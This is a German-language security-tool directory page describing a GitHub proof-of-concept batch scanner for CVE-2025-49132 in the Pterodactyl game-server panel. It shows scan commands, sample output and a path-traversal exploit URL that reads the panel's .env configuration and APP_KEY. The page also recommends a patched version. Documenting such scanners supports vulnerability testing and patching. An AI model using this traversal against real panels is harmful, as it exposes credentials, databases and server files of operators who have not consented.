Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132_poc — Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓 | Kitploit
Tools/GitHubGitHub/qiaojojo/cve-2025-49132_poc
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubqiaojojo/cve-2025-49132_poc

CVE-2025-49132_poc

Pterodactyl翼龙面板CVE-2025-49132批量检测☝️🤓

Repository anzeigen
4vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49132_poc

Verwendungsbeispiele

  1. Einzelnes Ziel scannen:
root@kitploit:~
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
  1. Zielliste scannen:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f zielliste.txt
  1. Scanergebnisse speichern:
root@kitploit:~
python3 CVE-2025-49132_poc.py -f zielliste.txt -o scanergebnisse.txt

Ausgabebeispiele:

Wenn eine Schwachstelle vorhanden ist:

root@kitploit:~
[+] Schwachstelle vorhanden: Schwachstelle bestätigt

    Schwachstellendetails:
      • Schwachstellentyp: Pfadausgabe (Path Traversal)
      • Angriffsvektor: Zugriff auf /locales/locale.json über Pfadausgabe-Parameter
      • Exploit-URL: http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
      
    Mögliche Auswirkungen:
      • Lesen von Anmeldeinformationen aus der Panel-Konfigurationsdatei (.env)
      • Extrahieren vertraulicher Informationen aus der Datenbank
      • Zugriff auf vom Panel verwaltete Spielserver-Dateien
    
    Extrahierter APP_KEY: base64{{your_secret_key_here}}
    
    Behebungsempfehlung: Sofort auf Pterodactyl v1.11.11 oder höher aktualisieren

Wenn keine Schwachstelle vorhanden ist:

root@kitploit:~
[-] Keine Schwachstelle: Keine Schwachstelle vorhanden (Statuscode: 404)

Scan-Zusammenfassung:

root@kitploit:~
Scan-Zusammenfassung:
  • Gesamtzahl gescannter Ziele: 5
  • Ziele mit Schwachstelle: 2
  • Sichere Ziele: 3

[!] Kritisch: Es wurden Systeme mit Schwachstellen erkannt! Sofortige Maßnahmen erforderlich.
Tool herunterladen